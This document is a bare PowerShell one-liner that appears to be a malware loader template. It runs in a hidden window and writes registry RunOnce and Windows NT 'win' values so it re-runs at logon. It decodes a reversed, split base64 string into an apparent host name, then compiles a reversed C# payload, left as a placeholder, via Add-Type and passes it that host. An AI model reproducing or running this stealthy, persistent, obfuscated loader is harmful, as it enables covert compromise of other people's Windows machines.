powershell -nop -w hidden -c "
$c = 'conhost.exe --headless powershell -nop -w hidden -c '+[char]34+$MyInvocation.MyCommand+[char]34;
Set-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce' 'windows' 'conhost.exe --headless powershell -nop -w hidden -c cmd /c (Get-ItemProperty -Path ''HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows'').win';
Set-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows' 'win' $c;
$f='ask='+'=g'+'ClRmL'+'0V2b'+'tFm'+'blk=';
$d=$f.Substring(3,16).ToCharArray();[array]::Reverse($d);
$y=[System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String(($d -join '')));
$g='{{reversed_CSharp_payload_here}}';
$l=$g.ToCharArray();[array]::Reverse($l);
Add-Type -TypeDefinition ($l -join '');
[B]::ma($y.Trim())"
